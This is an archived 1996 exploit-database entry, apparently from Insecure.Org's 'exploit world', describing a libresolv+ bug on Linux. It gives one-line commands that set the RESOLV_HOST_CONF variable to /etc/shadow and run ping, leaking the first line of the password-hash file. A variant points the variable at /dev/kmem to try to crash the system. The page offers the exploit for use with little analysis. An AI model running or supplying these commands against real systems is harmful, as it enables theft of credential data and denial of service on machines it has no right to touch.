Resolv+ Linux library bug
Description: | The libresolv+ library can give out too much information and possibly to crash the system |
Author: | Possibly Jared Mauch (jared@puck.nether.net) |
Compromise: | users can read first line of any file (ie /etc/shadow) and they can possibly crash the system. |
Vulnerable Systems: | Many Linux distributions. |
Date: | 1996 |
Exploit:
setenv RESOLV_HOST_CONF /etc/shadow; ping adfas
it might also be possibly to crash the system with things like:
'setenv RESOLV_HOST_CONV /dev/kmem;ping asdfas' or the like
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: